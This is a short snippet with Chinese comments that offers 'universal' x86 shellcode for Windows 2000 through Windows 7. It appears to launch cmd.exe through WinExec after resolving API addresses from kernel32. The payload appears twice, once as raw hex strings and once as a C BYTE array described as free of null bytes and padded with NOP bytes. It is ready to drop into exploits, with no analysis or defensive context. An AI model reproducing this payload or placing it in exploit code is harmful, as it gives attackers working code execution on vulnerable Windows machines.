//  Windows 2000, Windows 2003, Windows XP
//  Windows Vista, Windows 7通用cmd Shellcode

"\xfc\x33\xd2\xb2\x30\x64\xff\x32\x5a\x8b\x52\x0c\x8b\x52\x14\x8b"
"\x72\x28\x33\xc9\xb1\x18\x33\xff\x33\xc0\xac\x3c\x61\x7c\x02\x2c"
"\x20\xc1\xcf\x0d\x03\xf8\xe2\xf0\x81\xff\x5b\xbc\x4a\x6a\x8b\x5a"
"\x10\x8b\x12\x75\xda\x8b\x53\x3c\x03\xd3\xff\x72\x34\x8b\x52\x78"
"\x03\xd3\x8b\x72\x20\x03\xf3\x33\xc9\x41\xad\x03\xc3\x81\x38\x47"
"\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78"
"\x08\x64\x64\x72\x65\x75\xe2\x49\x8b\x72\x24\x03\xf3\x66\x8b\x0c"
"\x4e\x8b\x72\x1c\x03\xf3\x8b\x14\x8e\x03\xd3\x52\x68\x78\x65\x63"
"\x01\xfe\x4c\x24\x03\x68\x57\x69\x6e\x45\x54\x53\xff\xd2\x68\x63"
"\x6d\x64\x01\xfe\x4c\x24\x03\x6a\x05\x33\xc9\x8d\x4c\x24\x04\x51"
"\xff\xd0\x68\x65\x73\x73\x01\x8b\xdf\xfe\x4c\x24\x03\x68\x50\x72"
"\x6f\x63\x68\x45\x78\x69\x74\x54\xff\x74\x24\x20\xff\x54\x24\x20"
"\x57\xff\xd0"



不包含\x00
BYTE shellcode[MAX_BYTE]=
"\xfc\x33\xd2\xb2\x30\x64\xff\x32\x5a\x8b\x52\x0c\x8b\x52\x14\x8b"
"\x72\x28\x33\xc9\xb1\x18\x33\xff\x33\xc0\xac\x3c\x61\x7c\x02\x2c"
"\x20\xc1\xcf\x0d\x03\xf8\xe2\xf0\x81\xff\x5b\xbc\x4a\x6a\x8b\x5a"
"\x10\x8b\x12\x75\xda\x8b\x53\x3c\x03\xd3\xff\x72\x34\x8b\x52\x78"
"\x03\xd3\x8b\x72\x20\x03\xf3\x33\xc9\x41\xad\x03\xc3\x81\x38\x47"
"\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78"
"\x08\x64\x64\x72\x65\x75\xe2\x49\x8b\x72\x24\x03\xf3\x66\x8b\x0c"
"\x4e\x8b\x72\x1c\x03\xf3\x8b\x14\x8e\x03\xd3\x52\x68\x78\x65\x63"
"\x01\xfe\x4c\x24\x03\x68\x57\x69\x6e\x45\x54\x53\xff\xd2\x68\x63"
"\x6d\x64\x01\xfe\x4c\x24\x03\x6a\x05\x33\xc9\x8d\x4c\x24\x04\x51"
"\xff\xd0\x68\x65\x73\x73\x01\x8b\xdf\xfe\x4c\x24\x03\x68\x50\x72"
"\x6f\x63\x68\x45\x78\x69\x74\x54\xff\x74\x24\x20\xff\x54\x24\x20"
"\x57\xff\xd0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";